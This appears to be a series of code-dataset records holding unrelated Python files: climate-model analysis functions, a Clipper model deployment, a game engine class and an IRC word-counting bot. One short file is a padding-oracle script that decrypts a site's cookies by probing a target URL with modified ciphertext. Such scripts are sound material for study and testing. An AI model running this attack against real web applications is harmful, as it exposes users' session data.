weights=tiledWeights, axis=0)\n    return returnDict\n\n    \n    \n# Function to calculate Estimated Inversion Strength (Wood & Bretherton, 2006), \n# averaged over multiple years (but not doing any spatial averaging).\n# Results only valid over the ocean. 
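# The quantity computed below is Wood & Bretherton (2006), eq. 4:
#     EIS = LTS - Gamma_m850*(z700 - LCL),
# where LTS = theta(700 hPa) - theta(surface), Gamma_m850 is the moist-adiabatic
# potential temperature gradient evaluated at 850 hPa, z700 is the height of the
# 700 hPa surface, and LCL is the lifting condensation level height.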
\n#\n# Inputs:\n# Data: A dictionary of NetCDF Dataset objects containing the following variables, with keys as follows:\n# 'tas': Near-surface air temperature\n# 'ta': Air temperature at various heights\n# 'huss': Near-surface specific humidity \n# 'ps': Surface pressure\n# firstYear: First year of the multi-year averaging, measured from the start of the file starting at 0\n# lastYear: Last year of the multi-year averaging, measured from the start of the file starting at 0\n# index700: Index of the 700 hPa pressure level, starting from 0. For standard CMIP5 pressure levels in \n# order of decreasing pressure, this is 3. \n# monthWeights: see \"calcLowMiddleHighClouds\" documentation\n# \n# Returns: a 2D array (lat, lon dimensions)\ndef multiYearMeanEIS(Data, firstYear, lastYear, index700=3, monthWeights='none'):\n #Define physical constants \n Rd = 287. # J kg^-1 K^-1\n Rv = 461. # J kg^-1 K^-1\n Cp = 1004. # J kg^-1 K^-1\n Lv = 2.5e6 # J kg^-1\n g = 9.81 # m s^-2\n \n #Define the temperature, pressure and specific humidity variables \n #(Internal variable names holdovers from CESM analysis script)\n #Also do time subset now, so not doing calculations for entire dataset, only the years needed.\n T700 = Data['ta'].variables['ta'][firstYear*12:lastYear*12+12,index700,:,:] #Temperature at 700 hPa in K (time, lat, lon)\n T0 = Data['tas'].variables['tas'][firstYear*12:lastYear*12+12, :,:] #Surface air temperature in K\n PS = Data['ps'].variables['ps'][firstYear*12:lastYear*12+12, :,:]/100. #Divide by 100 to go from Pa (CMIP5 standard) to hPa\n QS = Data['huss'].variables['huss'][firstYear*12:lastYear*12+12, :,:] #Surface specific humidity, as a fraction (kg/kg)\n \n #Calculate the LTS (part of the EIS)\n Theta0 = T0*np.power((1000./PS),(Rd/Cp))\n Theta700 = T700*np.power((1000./700.),(Rd/Cp))\n LTS_3D = Theta700 - Theta0 #3D in the sense of time, lat, lon\n \n #Calculate the height of the Lifting Condensation Level (LCL)\n partialPressureWaterVapor = QS*(29./18.) \n e = partialPressureWaterVapor*PS #Vapor pressure in hPa\n Td = 243.5*np.log(e/6.112)/(17.67-np.log(e/6.112)) #Dew point, Bolton, 1980, eq. 11 (rearr. to more commonly used form)\n Td = Td + 273.15 #Td was in degrees C, needed to convert to K.\n LCL = (T0 - Td)/.008 #Lamb & Verlinde, 2011, eq. 6.16 (The denominator is in deg C / m)\n \n #Calculate the height of the 700 hPa surface\n z700 = (Rd*T0/g)*np.log(PS/700.) #Wood & Bretherton, 2006, eq. 6\n \n #Calculate the moist-adiabatic potential temperature gradient\n T850 = (T0 + T700)/2. #850 hPa temperature\n T850degC = T850 - 273.15 #Convert to degrees C for following equation\n es850 = 6.112*np.exp(17.67*T850degC/(T850degC+243.5)) #Saturation vapor pressure, Bolton, 1980, eq. 10\n Qsat850 = (es850/850.)*(18./29.) #Saturation specific humidity at 850 hPa\n Gamma_m850 = (g/Cp)*(1-(1+Lv*Qsat850/(Rd*T850))/(1+Lv*Lv*Qsat850/(Cp*Rv*T850*T850))) #Wood & Bretherton, 2006, eq. 5\n \n #Put it all together to get EIS\n EIS_3D = LTS_3D - Gamma_m850*(z700-LCL) #Wood & Bretehrton, 2006, eq. 
4\n    \n    #Now take multi-year mean (have already subsetted in time, so do this over entire time axis)\n    if monthWeights == 'none':\n        multiYearMeanData = np.mean(EIS_3D, axis=0)\n    else:\n        tiledWeights = np.tile(monthWeights,np.shape(EIS_3D)[0]//12)\n        multiYearMeanData = np.average(EIS_3D, weights=tiledWeights, axis=0)\n    return multiYearMeanData \n    \n\n# Similar function to \"multiYearMeanEIS\" but instead returns LTS, the lower tropospheric stability \n# (difference in potential temperature between the surface and 700 hPa)\n# Same inputs as multiYearMeanEIS, except don't need the humidity stuff in the \"Data\" input dict.\n# monthWeights: see \"calcLowMiddleHighClouds\" documentation\ndef multiYearMeanLTS(Data, firstYear, lastYear, index700=3, monthWeights='none'):\n    #Define physical constants \n    Rd = 287. # J kg^-1 K^-1\n    Cp = 1004. # J kg^-1 K^-1\n    \n    #Define the temperature, pressure and specific humidity variables \n    #(Internal variable names holdovers from CESM analysis script)\n    #Also do time subset now, so not doing calculations for entire dataset, only the years needed.\n    T700 = Data['ta'].variables['ta'][firstYear*12:lastYear*12+12,index700,:,:] #Temperature at 700 hPa in K (time, lat, lon)\n    T0 = Data['tas'].variables['tas'][firstYear*12:lastYear*12+12, :,:] #Surface air temperature in K\n    PS = Data['ps'].variables['ps'][firstYear*12:lastYear*12+12, :,:]/100. #Divide by 100 to go from Pa (CMIP5 standard) to hPa\n    \n    #Calculate the LTS (part of the EIS)\n    Theta0 = T0*np.power((1000./PS),(Rd/Cp))\n    Theta700 = T700*np.power((1000./700.),(Rd/Cp))\n    LTS_3D = Theta700 - Theta0 #3D in the sense of time, lat, lon\n    \n    #Now take multi-year mean (have already subsetted in time, so do this over entire time axis)\n    if monthWeights == 'none':\n        multiYearMeanData = np.mean(LTS_3D, axis=0)\n    else:\n        tiledWeights = np.tile(monthWeights,np.shape(LTS_3D)[0]//12)\n        multiYearMeanData = np.average(LTS_3D, weights=tiledWeights, axis=0)\n    return multiYearMeanData \n    \n    \n#Dictionary of colors for each model for plotting purposes\n#Note the 2-digit codes for the model which I will consistently use as dictionary keys. \nmodelColors = dict()\nmodelColors['bn'] = 'magenta' #BNU-ESM\nmodelColors['ca'] = 'indigo' #CanESM-2\nmodelColors['cc'] = 'cornflowerblue' #CCSM4\nmodelColors['ce'] = 'blue' #CESM-CAM5.1-FV\nmodelColors['cs'] = 'teal' #CSIRO\nmodelColors['ec'] = 'springgreen' #EC-EARTH-DMI\nmodelColors['gi'] = 'green' #GISS-E2-R\nmodelColors['hc'] = 'lime' #HadCM3\nmodelColors['hg'] = 'gold' #HadGEM2-ES\nmodelColors['ip'] = 'darkgoldenrod' #IPSL-CM5A-LR\nmodelColors['mi'] = 'orange' #MIROC-ESM\nmodelColors['mp'] = 'red' #MPI-ESM-LR\nmodelColors['no'] = 'maroon' #NorESM1\nmodelColors['mm'] = 'k' #Multi-Model Mean \n\n#On that note, need dictionary of names for the models, for plot legends. 
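# (Example use of the two dicts together, assuming matplotlib.pyplot is imported
#  as plt and x, y hold one model's time series:
#  plt.plot(x, y, color=modelColors['ca'], label=modelNames['ca'])
#  draws CanESM-2 in indigo with a matching legend entry.)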
\nmodelNames = dict()\nmodelNames['bn'] = 'BNU-ESM'\nmodelNames['ca'] = 'CanESM-2'\nmodelNames['cc'] = 'CCSM4'\nmodelNames['ce'] = 'CESM-CAM5.1-FV'\nmodelNames['cs'] = 'CSIRO-Mk3L-1-2'\nmodelNames['ec'] = 'EC-EARTH-DMI'\nmodelNames['gi'] = 'GISS-E2-R'\nmodelNames['hc'] = 'HadCM3'\nmodelNames['hg'] = 'HadGEM2-ES'\nmodelNames['ip'] = 'IPSL-CM5A-LR'\nmodelNames['mi'] = 'MIROC-ESM'\nmodelNames['mp'] = 'MPI-ESM-LR'\nmodelNames['no'] = 'NorESM1-M'\nmodelNames['mm'] = 'Multi-Model Mean'\n\n\n\n#### Stuff for time series analysis ####\n\n\nclass MonthlyTimeSeries:\n\n def __init__(self, data, startMonth, startYear):\n self.data1D = data #raw data for plots of the full time series\n self.startMonth = startMonth\n self.startYear = startYear\n #Set up a 2D matrix with each column representing a month\n #while padding incomplete years at beginning and end with nans.\n if (len(data)+startMonth-1)%12 == 0:\n self.numYearsSpanned = (len(data)+startMonth-1)//12\n else:\n self.numYearsSpanned = (len(data)+startMonth-1)//12+1\n padBeginning = startMonth-1\n padEnd = 12-(len(data)+padBeginning)%12\n if padEnd == 12:\n padEnd = 0\n paddedData = np.pad(data, (padBeginning, padEnd), \n 'constant', constant_values = (np.nan,np.nan)) \n self.data2D = np.reshape(paddedData, (self.numYearsSpanned,12))\n self.years = np.arange(startYear, startYear+self.numYearsSpanned)\n\n #annual mean (incomplete years will be counted)\n def annualMean(self):\n return np.nanmean(self.data2D,axis=1)\n\n #mam (spring) mean\n def mamMean(self):\n return np.nanmean(self.data2D[:,2:5],axis=1)\n\n #jja (summer) mean\n def jjaMean(self):\n return np.nanmean(self.data2D[:,5:8],axis=1)\n\n #son (autumn) mean\n def sonMean(self):\n return np.nanmean(self.data2D[:,8:11],axis=1)\n\n #djf (winter) mean\n #How do I want to do this? Want to include December of previous year\n #reshape into vector, add 1 nan at beginning and delete the last one,\n #reshape back to matrix (now elements are shifted) and nanmean the 1st\n #3 columns. \n def djfMean(self):\n vect = np.reshape(self.data2D, (self.data2D.size,1)) \n vect=np.squeeze(vect)\n #vect = np.pad(vect, (1,0), 'constant', constant_values=(np.nan,np.nan))\n vect = np.concatenate((np.array([np.nan]),vect))\n vect = vect[0:len(vect)-1] #Delete last month so still divisible by 12\n mat = np.reshape(vect, (self.numYearsSpanned,12))\n return np.nanmean(mat[:,0:3],axis=1)\n\n\n# Function to calculate the global mean of a variable\n# from the GCM output. Now using the \n# latitudes taken from the netCDF file itself.\n# This version is for all times (returns an array with the \n# means for every month). 
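# (Why cos(latitude) works as the weight: on a uniform lat-lon grid, cell area is
# proportional to cos(latitude), and the constant of proportionality cancels
# between the weighted sum and the sum of weights below.)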
\ndef globalMean(Data, varname): #\"data\" is netCDF4 data object\n latitudes = Data.variables['lat'][:]\n areaWeights = np.cos(latitudes*np.pi/180)\n datavar = np.squeeze(Data.variables[varname][:]) #Squeeze in case this is 1 slice from a height-varying array\n areaWeights3D = np.swapaxes(np.tile(areaWeights,\n (np.shape(datavar)[0],np.shape(datavar)[2],1)),\n 1,2) #Replicating the area weights \n weighted3DMatrix = datavar*areaWeights3D\n sumWeighted = np.sum(weighted3DMatrix,axis=(1,2))\n sumWeights3D = np.sum(areaWeights3D,axis=(1,2))\n weightedMean = sumWeighted/sumWeights3D\n return weightedMean\n\n\n\n\n#### Alternative versions of various functions which were used for testing ####\n\n#Northward energy flux functions in which time mean was done after integration \n#(didn't matter, and this version is slower so don't use)\ndef AtmosEnergyVerticalFluxConvergenceV2(DataDict, firstYear, lastYear):\n #Calculate the energy flux into the column\n fluxConv = ( DataDict['rsdt'].variables['rsdt'][firstYear*12:lastYear*12+12,:,:] \n - DataDict['rsut'].variables['rsut'][firstYear*12:lastYear*12+12,:,:]\n - DataDict['rlut'].variables['rlut'][firstYear*12:lastYear*12+12,:,:]\n - DataDict['rsds'].variables['rsds'][firstYear*12:lastYear*12+12,:,:]\n - DataDict['rlds'].variables['rlds'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['rsus'].variables['rsus'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['rlus'].variables['rlus'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['hfls'].variables['hfls'][firstYear*12:lastYear*12+12,:,:]\n + DataDict['hfss'].variables['hfss'][firstYear*12:lastYear*12+12,:,:])\n return fluxConv\n\ndef AtmosEnergyTransportNorthwardV2(fluxConv, lat, lon, a):\n #First calculate grid cell area\n latDiff = lat[1]-lat[0]\n lonDiff = lon[1]-lon[0]\n gridCellAreas = a*a*(latDiff*np.pi/180.)*(lonDiff*np.pi/180.)*np.cos(lat*np.pi/180.) 
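    # (standard spherical area element: a^2 * dlon * dlat * cos(lat) per cell,
    # assuming uniform lat/lon spacing as computed from the first two entries)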
#Vector based on latitude\n \n #Now calculate total energy flux in grid boxes in Watts (not W/m^2)\n fluxWatts = fluxConv*gridCellAreas[None, :,None] #Dimensions of fluxConv are time, lat,lon;\n #\"None\" ensures weighting by lat, not lon, even if square grid.\n\n #Now integrate over longitudes\n fluxWattsZonalSum = np.sum(fluxWatts,axis=2) #Result: 2D array, dimensions: time, lat\n #Now cumuliatively integrate over latitudes\n energyTransportNorthward = np.cumsum(fluxWattsZonalSum, axis=1) #result: 2D array, dimensions: time, lat\n #Finally, take time mean\n energyTransportNorthwardMultiYearMean = np.mean(energyTransportNorthward,axis=0)\n return energyTransportNorthwardMultiYearMean\n","sub_path":"backup/geomipFunctions.py","file_name":"geomipFunctions.py","file_ext":"py","file_size_in_byte":70994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"600387505","text":"from sklearn.ensemble import GradientBoostingClassifier\nimport numpy as np\nimport pandas as pd\nimport json\nimport requests\n\n# load data\nckd = pd.read_csv(\"data/kidney_disease.csv\")\n\n#make binary variable of outcome\nckd[\"classification\"] = np.where(ckd[\"classification\"] == \"ckd\" , 1, 0)\n\n#drop unnecessary columns\nckd.drop(['id','rbc','pc','pcc','pcv','wc','rc','ba','dm','cad','appet','pe',\n 'ane','sg','sc','pot','hemo','htn'],axis=1 ,inplace=True)\n\n#create train features and labels\nX = ckd.iloc[:300,]\nX = X.loc[:, X.columns != 'classification']\nX.fillna(0,inplace=True)\ny= ckd.iloc[:300,-1]\n\n# train a classifier\nmodel = GradientBoostingClassifier(random_state=2019)\nmodel.fit(X, y)\n\n# First we need to import Clipper\nfrom clipper_admin import ClipperConnection, KubernetesContainerManager\nfrom clipper_admin.deployers.python import deploy_python_closure\n\n# Create a Clipper connection\nclipper_conn = ClipperConnection(KubernetesContainerManager(useInternalIP=True,\n kubernetes_proxy_addr=\"127.0.0.1:8080\"))\n\n# Start a Clipper cluster or connect to a running one\nclipper_conn.start_clipper()\n\n# Register an app called 'kddtutorial'. This would create a REST endpoint\nclipper_conn.register_application(name=\"kddtutorial\", input_type=\"doubles\",\n default_output=\"-1.0\", slo_micros=10000000)\n\n# Access the trained model via closure capture\ndef predict(inputs):\n global model\n pred = model.predict(inputs)\n return [str(p) for p in pred]\n\n# Point to the gradient boosting model\nmodel = model\n\n# Deploy the 'predict' function as a model\ndeploy_python_closure(clipper_conn, name=\"gb-model\",\n version=1, input_type=\"doubles\", func=predict,\n pkgs_to_install=['scikit-learn','pandas','numpy','scipy'],\n registry= \"gkip\")\n\n# Routes requests for the application 'kddtutorial' to the model 'gb-model'\nclipper_conn.link_model_to_app(app_name=\"kddtutorial\", model_name=\"gb-model\")\n\ninputs = X.loc[200, X.columns != 'classification'] # use random data point\nheaders = {\"Content-type\": \"application/json\"}\naddr = clipper_conn.get_query_addr()\nresponse =requests.post(\"http://%s/%s/predict\" % (addr, 'kddtutorial'), headers=headers,\n data=json.dumps({\"input\": list(inputs)})).json()\nprint(response)\n\nclipper_conn.stop_all()\n","sub_path":"clipper/clipper_kubernetes.py","file_name":"clipper_kubernetes.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508592447","text":"\"\"\"\nThis script can be used to decrypt a cookie. 
It should be called with:\n python3 decrypt.py $HEX_ENCODED_COOKIE\n\"\"\"\nfrom paddingoracle import BadPaddingException, PaddingOracle\nimport requests\nfrom sys import argv\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass PadBuster(PaddingOracle):\n def __init__(self, target_url, **kwargs):\n super(PadBuster, self).__init__(**kwargs)\n self.target_url = target_url\n\n def oracle(self, data, **kwargs):\n cookies = {\n 'user_object': data.hex(),\n }\n\n response = requests.get(self.target_url, cookies=cookies)\n if not response.ok:\n raise BadPaddingException\n\n\nif __name__ == '__main__':\n target_url = argv[1]\n encrypted_cookie = bytes.fromhex(argv[2])\n\n padbuster = PadBuster(target_url)\n cookie = padbuster.decrypt(encrypted_cookie, block_size=16)\n\n print('Decrypted cookie: %s => %s' % (argv[1], cookie))","sub_path":"example_decrypt_http.py","file_name":"example_decrypt_http.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"72371987","text":"# engine/gameblueprint.py\n# Lillian Lynn Lemmer \n#\n# This module is part of Untitled Game Engine and is released under the\n# MIT License: http://opensource.org/licenses/MIT\n\n\"\"\"Logic flow for the game.\n\nNote:\n I have not decided firmly on the approach to take. Expect heavy\n changes in the future.\n\n Sorry for the poor documentation, I have not devised an actual\n architecture for this particular module. I have not decided\n firmly on the approach to take. Here, I'm sort of imitating\n Flask's app.\n\n\"\"\"\n\n__author__ = \"Lillian Lemmer\"\n__copyright__ = \"Copyright 2015, Lillian Lemmer\"\n__credits__ = [\"Lillian Lemmer\"]\n__license__ = \"MIT\"\n__maintainer__ = \"Lillian Lemmer\"\n__email__ = \"lillian.lynn.lemmer@gmail.com\"\n__status__ = \"Development\"\n\n\nclass GameBlueprint(object):\n\n def __init__(self, screen, tilemap, viewport, human_player, items=None):\n self.human_player = human_player\n self.tilemap = tilemap\n self.viewport = viewport\n self.items = items or []\n self.screen = screen\n\n def init(self):\n self.tilemap.convert_layer_images()\n self.human_player.init()\n\n def item_check(self):\n ungot_items = []\n\n for item in self.items:\n\n if item.rect.colliderect(self.human_player.rect):\n # should this be player.pickup item? 
or both?\n item.pickup(self.human_player)\n else:\n ungot_items.append(item)\n\n self.items = ungot_items\n\n def blit_all(self):\n self.viewport.pan_for_entity(self.human_player)\n self.viewport.blit(self.tilemap.layer_images[0])\n\n for item in self.items:\n item.blit(self.viewport.surface,\n (self.viewport.start_x, self.viewport.start_y))\n\n self.human_player.blit(\n self.viewport.surface,\n (\n self.viewport.start_x,\n self.viewport.start_y\n )\n )\n\n for layer in self.tilemap.layer_images[1:]:\n self.viewport.blit(layer)\n\n","sub_path":"engine/gameblueprint.py","file_name":"gameblueprint.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"64823410","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nimport sys\nimport irc.bot\nimport socket\nimport traceback\nimport signal\nfrom irc.client import ServerNotConnectedError\nfrom time import gmtime\nfrom calendar import timegm\nfrom collections import defaultdict, OrderedDict\nfrom unicodedata import normalize as unicode_normalize\n\nWORDS = re.compile(r\"(?:-\\w|\\w)[-\\w]*\")\nTIME = re.compile(r\"\\s*(\\d+)\\s*([a-z]+)?\\s*\")\n\nEXIT_EXCS = SystemExit, KeyboardInterrupt\nROW_TYPES = tuple, list\n\ndef normalize(word):\n\treturn unicode_normalize('NFC', word).lower()\n\ndef normalize_channel(channel):\n\tchannel = channel.lower()\n\tif not channel.startswith('#'):\n\t\tchannel = '#'+channel\n\treturn channel\n\ndef parse_int_bound(value):\n\tvalue = value.lower()\n\tif value == 'none' or value == 'null' or value == 'unbounded' or value == 'unlimited':\n\t\treturn None\n\telse:\n\t\treturn int(value, 10)\n\ndef parse_time(time):\n\tif not time:\n\t\traise ValueError(time)\n\n\tindex = 0\n\tseconds = 0\n\twhile index < len(time):\n\t\tmatch = TIME.match(time, index)\n\t\tif not match:\n\t\t\traise ValueError(time)\n\n\t\tvalue = int(match.group(1), 10)\n\t\tunit = match.group(2)\n\n\t\tif unit:\n\t\t\tunit = unit.lower()\n\t\telse:\n\t\t\tunit = 'seconds'\n\n\t\tif unit == 's' or unit == 'sec' or unit == 'secs' or unit == 'seconds' or unit == 'second':\n\t\t\tseconds += value\n\n\t\telif unit == 'm' or unit == 'min' or unit == 'mins' or unit == 'minutes' or unit == 'minute':\n\t\t\tseconds += value * 60\n\n\t\telif unit == 'h' or unit == 'hours' or unit == 'hour':\n\t\t\tseconds += value * 3600\n\n\t\telse:\n\t\t\traise ValueError(time)\n\n\t\tindex = match.end()\n\n\treturn seconds\n\ndef format_time(seconds):\n\tif seconds == 0:\n\t\treturn '0sec'\n\n\tnegative = seconds < 0\n\tif negative:\n\t\tseconds = -seconds\n\tminutes = seconds // 60\n\tseconds -= minutes * 60\n\thours = minutes // 60\n\tminutes -= hours * 60\n\n\tbuf = []\n\tif hours:\n\t\tbuf.append('%dh' % hours)\n\n\tif minutes:\n\t\tbuf.append('%dmin' % minutes)\n\n\tif seconds:\n\t\tbuf.append('%dsec' % seconds)\n\n\ttime = ' '.join(buf)\n\n\tif negative:\n\t\ttime = '-'+time\n\n\treturn time\n\nclass ChannelData:\n\t__slots__ = 'period', 'counts', 'minint', 'maxint', 'result_limit'\n\n\tdef __init__(self, period, minint=None, maxint=None, result_limit=None, counts=None):\n\t\tself.period = period\n\t\tself.counts = counts if counts is not None else []\n\t\tself.minint = minint\n\t\tself.maxint = maxint\n\t\tself.result_limit = result_limit\n\t\t# maybe more in the future\n\n\tdef dump(self):\n\t\treturn {\n\t\t\t'period': self.period,\n\t\t\t'counts': [list(row) for row in self.counts],\n\t\t\t'minint': self.minint,\n\t\t\t'maxint': self.maxint,\n\t\t\t'result_limit': 
self.result_limit\n\t\t}\n\n\tdef find_first_non_gc_count(self, periodts):\n\t\tfor index, (user, word, timestamp) in enumerate(self.counts):\n\t\t\tif timestamp >= periodts:\n\t\t\t\treturn index\n\t\treturn len(self.counts)\n\nclass CounterBot(irc.bot.SingleServerIRCBot):\n\t__slots__ = ('home_channel', 'default_period', 'gcinterval', 'admins', 'ignored_users',\n\t             'channel_data', 'join_channels', 'joined_channels', 'gc_scheduled',\n\t             'max_message_length', 'default_minint', 'default_maxint', 'default_result_limit')\n\n\tdef __init__(self, home_channel, default_period, gcinterval, max_message_length,\n\t             default_minint, default_maxint, default_result_limit, admins,\n\t             ignored_users, nickname, channels, password=None,\n\t             server='irc.twitch.tv', port=6667):\n\t\tirc.bot.SingleServerIRCBot.__init__(self, [(server, port, password)], nickname, nickname)\n\t\tself.home_channel = normalize_channel(home_channel) if home_channel else None\n\t\tself.default_period = default_period\n\t\tself.gcinterval = gcinterval\n\t\tself.max_message_length = max_message_length\n\t\tself.default_minint = default_minint\n\t\tself.default_maxint = default_maxint\n\t\tself.default_result_limit = default_result_limit\n\t\tself.admins = set(admin.lower() for admin in admins)\n\t\tself.ignored_users = set(user.lower() for user in ignored_users)\n\t\tself.channel_data = defaultdict(self.make_channel_data)\n\t\tself.joined_channels = set()\n\t\tself.set_join_channels(channels)\n\t\tself.gc_scheduled = False\n\t\tself.schedule_gc_if_needed()\n\n\tdef make_channel_data(self):\n\t\treturn ChannelData(self.default_period, self.default_minint, self.default_maxint, self.default_result_limit)\n\n\tdef schedule_gc_if_needed(self):\n\t\tif not self.gc_scheduled:\n\t\t\tneeded = False\n\t\t\tfor data in self.channel_data.values():\n\t\t\t\tif data.counts:\n\t\t\t\t\tneeded = True\n\t\t\t\t\tbreak\n\t\t\tif needed: # only schedule a GC pass when there is something to collect\n\t\t\t\tself.schedule_gc()\n\n\tdef schedule_gc(self):\n\t\tself.connection.execute_delayed(self.gcinterval, self.run_gc)\n\t\tself.gc_scheduled = True\n\n\tdef set_join_channels(self, channels):\n\t\tchannels = OrderedDict((normalize_channel(channel), True) for channel in channels)\n\t\tif self.home_channel in channels:\n\t\t\tdel channels[self.home_channel]\n\t\tself.join_channels = list(channels)\n\n\tdef run_gc(self):\n\t\tself.gc_scheduled = False\n\t\ttimestamp = timegm(gmtime())\n\t\tdelchannels = []\n\t\tfor channel in self.channel_data:\n\t\t\tif channel not in self.joined_channels:\n\t\t\t\tdelchannels.append(channel)\n\n\t\trowcount = 0\n\t\tfor channel in delchannels:\n\t\t\trowcount += len(self.channel_data[channel].counts)\n\t\t\tdel self.channel_data[channel]\n\n\t\tneeded = False\n\t\tfor data in self.channel_data.values():\n\t\t\tperiodts = timestamp - data.period\n\t\t\tindex = data.find_first_non_gc_count(periodts)\n\n\t\t\tif index > 0:\n\t\t\t\tdel data.counts[:index]\n\t\t\t\trowcount += index\n\n\t\t\tif data.counts:\n\t\t\t\tneeded = True\n\n\t\tprint('gc: Deleted %d rows.' 
% rowcount if rowcount != 1 else 'gc: Deleted 1 row.')\n\n\t\tif needed:\n\t\t\tself.schedule_gc()\n\n\tdef on_welcome(self, connection, event):\n\t\tif self.home_channel is not None:\n\t\t\tself.do_join(self.home_channel)\n\n\t\tfor channel in self.join_channels:\n\t\t\tself.do_join(channel)\n\n\t\tconnection.cap('REQ', 'twitch.tv/membership')\n\n\t\tif self.home_channel is not None:\n\t\t\tself.chunked_privmsg(self.home_channel, \"%s booted!\" % self.connection.get_nickname())\n\n\tdef do_join(self, channel):\n\t\tself.connection.join(channel)\n\t\tself.joined_channels.add(channel)\n\t\tself.chunked_privmsg(self.home_channel or channel, \"Joined to %s.\" % channel)\n\n\tdef do_part(self, channel):\n\t\tself.connection.part(channel)\n\n\t\t# delete data immediately, don't trust what the IRC server says\n\t\tif channel in self.channel_data:\n\t\t\tdel self.channel_data[channel]\n\n\t\tif channel in self.joined_channels:\n\t\t\tself.joined_channels.remove(channel)\n\n\t\tif self.home_channel is not None:\n\t\t\tself.chunked_privmsg(self.home_channel, \"Parted from %s.\" % channel)\n\n\tdef on_nicknameinuse(self, connection, event):\n\t\tprint('Error: nickname in use', file=sys.stderr)\n\n\tdef on_error(self, connection, event):\n\t\tprint('Error: '+' '.join(event.arguments), file=sys.stderr)\n\n\tdef on_pubmsg(self, connection, event):\n\t\tsender = event.source.nick\n\n\t\tif sender in self.ignored_users:\n\t\t\treturn\n\n\t\tchannel = event.target\n\t\tmessage = event.arguments[0]\n\n\t\tif message.startswith(\"!\"):\n\t\t\tcommand, *args = message.rstrip().split()\n\t\t\tcommand = command[1:]\n\t\t\tif channel == self.home_channel:\n\t\t\t\tmethod = 'home_cmd_'+command\n\t\t\t\tif not hasattr(self, method):\n\t\t\t\t\tmethod = 'cmd_'+command\n\t\t\telse:\n\t\t\t\tmethod = 'cmd_'+command\n\n\t\t\tif hasattr(self, method):\n\t\t\t\ttry:\n\t\t\t\t\tcmd = getattr(self, method)\n\n\t\t\t\t\tmin_argc = max_argc = cmd.__code__.co_argcount - 2\n\t\t\t\t\tif cmd.__defaults__:\n\t\t\t\t\t\tmin_argc -= len(cmd.__defaults__)\n\t\t\t\t\tif cmd.__code__.co_flags & 0x4:\n\t\t\t\t\t\tmax_argc = None\n\n\t\t\t\t\targc = len(args)\n\t\t\t\t\tif max_argc is not None and argc > max_argc:\n\t\t\t\t\t\tself.answer(event,\n\t\t\t\t\t\t\t'@%s: Too many arguments. !%s takes no more than %d argument(s).' %\n\t\t\t\t\t\t\t(sender, command, max_argc))\n\n\t\t\t\t\telif argc < min_argc:\n\t\t\t\t\t\tself.answer(event,\n\t\t\t\t\t\t\t'@%s: Not enough arguments. !%s takes at least %d argument(s).' 
%\n\t\t\t\t\t\t\t(sender, command, min_argc))\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tcmd(event, *args)\n\n\t\t\t\texcept Exception as exc:\n\t\t\t\t\tif isinstance(exc, EXIT_EXCS):\n\t\t\t\t\t\traise\n\n\t\t\t\t\ttraceback.print_exc()\n\n\t\t\t\t\tself.chunked_privmsg(self.home_channel,\n\t\t\t\t\t\t'Error processing command !%s in channel %s performed by %s: %s' %\n\t\t\t\t\t\t(command, channel, sender, exc))\n\n\t\telse:\n\t\t\ttimestamp = timegm(gmtime())\n\t\t\twords = WORDS.findall(message)\n\t\t\tif words:\n\t\t\t\tcounts = self.channel_data[channel].counts\n\t\t\t\tfor word in words:\n\t\t\t\t\tcounts.append((sender, normalize(word), timestamp))\n\n\t\t\t\tif not self.gc_scheduled:\n\t\t\t\t\tself.schedule_gc()\n\n\tdef is_allowed(self, user, channel):\n\t\tif user in self.admins:\n\t\t\treturn True\n\n\t\tif channel is None:\n\t\t\treturn False\n\n\t\tchan = self.channels[channel]\n\t\treturn chan.is_oper(user) or chan.is_admin(user) or chan.is_owner(user)\n\n\tdef cmd_countperiod(self, event, *time):\n\t\t\"\"\"\n\t\t\tGet or set the period in which words are counted for this channel.\n\t\t\tThe time can be given in hours, seconds or minutes, e.g.: 1h, 5min, 300sec, or 5m 30s\n\t\t\"\"\"\n\t\tsender = event.source.nick\n\t\tchannel = event.target\n\t\tif self.is_allowed(sender, channel):\n\t\t\tdata = self.channel_data[event.target]\n\t\t\tif not time:\n\t\t\t\tself.answer(event, \"@%s: count period = %s\" % (sender, format_time(data.period)))\n\t\t\telse:\n\t\t\t\ttime = ' '.join(time)\n\t\t\t\ttry:\n\t\t\t\t\tseconds = parse_time(time)\n\t\t\t\texcept ValueError as ex:\n\t\t\t\t\tself.answer(event, \"@%s: Illegal count period: %s\" % (sender, time))\n\t\t\t\telse:\n\t\t\t\t\tdata.period = seconds\n\t\t\t\t\tself.answer(event, \"@%s: Changed count period to %s\" % (sender, format_time(data.period)))\n\t\telse:\n\t\t\tself.answer(event, \"@%s: You don't have permissions to do that.\" % sender)\n\n\tdef cmd_count(self, event, *words):\n\t\t\"\"\"\n\t\t\tCount given words or if none given all words.\n\t\t\tEvery word is only counted once per user.\n\t\t\"\"\"\n\t\ttimestamp = timegm(gmtime())\n\t\tchannel = event.target\n\t\tdata = self.channel_data[channel]\n\t\tperiodts = timestamp - data.period\n\t\tchannel_counts = data.counts\n\t\tall_user_words = defaultdict(set)\n\n\t\tif words:\n\t\t\tword_counts = dict((normalize(word), 0) for word in words)\n\t\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\t\tif timestamp < periodts:\n\t\t\t\t\tbreak\n\n\t\t\t\tif word in word_counts:\n\t\t\t\t\tuser_words = all_user_words[user]\n\t\t\t\t\tif word not in user_words:\n\t\t\t\t\t\tword_counts[word] += 1\n\t\t\t\t\t\tuser_words.add(word)\n\n\t\t\t# de-normalize counted words\n\t\t\tword_counts = dict((word, word_counts[normalize(word)]) for word in words)\n\t\telse:\n\t\t\tword_counts = defaultdict(int)\n\t\t\tfor user, word, timestamp in reversed(channel_counts):\n\t\t\t\tif timestamp < 